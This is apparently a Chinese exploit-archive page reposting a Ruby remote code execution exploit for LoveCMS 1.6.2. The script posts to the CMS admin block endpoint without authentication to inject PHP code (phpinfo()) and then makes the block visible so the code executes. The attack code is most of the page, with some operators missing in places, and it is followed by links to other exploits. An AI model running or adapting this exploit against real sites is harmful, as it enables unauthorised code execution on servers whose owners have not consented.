手机
当前位置:查字典教程网 >网络安全 >Exploit >LoveCMS 1.6.2 Final Remote Code Execution Exploit
LoveCMS 1.6.2 Final Remote Code Execution Exploit
摘要:#!/usr/bin/ruby###ExploitbyPoMdaPiMp!##---------------------##pomdapim...

#!/usr/bin/ruby

#

## Exploit by PoMdaPiMp!

## ---------------------

## pomdapimp(at)gmail(dotcom)

##

## LoveCMS Exploit Series

## Episode 1: adding a side block

##

## Description: add some php into a block container

## on the side of the site. phpinfo() is called.

##

## Usage: ./LoveCMS_1_blocks.rb <host>

## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/

##

## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)

# require 'net/http'

require 'uri' @host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/' @host = ARGV[0] if ARGV[0]

@host = @host[-1, 1].to_s != '/' ? '/' : '' if @host

# --

puts " LoveCMS Exploit Series. #1: Adding side blocks."

puts

puts " : Attacking host: " @host # --

# Insert a new block

res = Net::HTTP.post_form(URI.parse(@host 'system/admin/addblock.php'),

{'submit'=>'1', 'title'=>'H4Ck', 'content' => 'phpinfo();', 'type' => 'php'})

puts " :: Block inserted." # --

# Build post variable for next step

post_vars = {'submit' => 1}

(1..50).each do |id|

post_vars['position' id.to_s] = 1

post_vars['height' id.to_s] = 1

post_vars['visible' id.to_s] = 1

end

# Make the block visible

res = Net::HTTP.post_form(URI.parse('http://127.0.0.1/lovecms_1.6.2_final/lovecms/system/admin/blocks.php'), post_vars )

puts " :: Blocks displayed." # --

puts

puts " - Visit " @host

end

【LoveCMS 1.6.2 Final Remote Code Execution Exploit】相关文章:

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

MS Windows (MessageBox) Memory Corruption Local Denial of Service

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

精品推荐
分类导航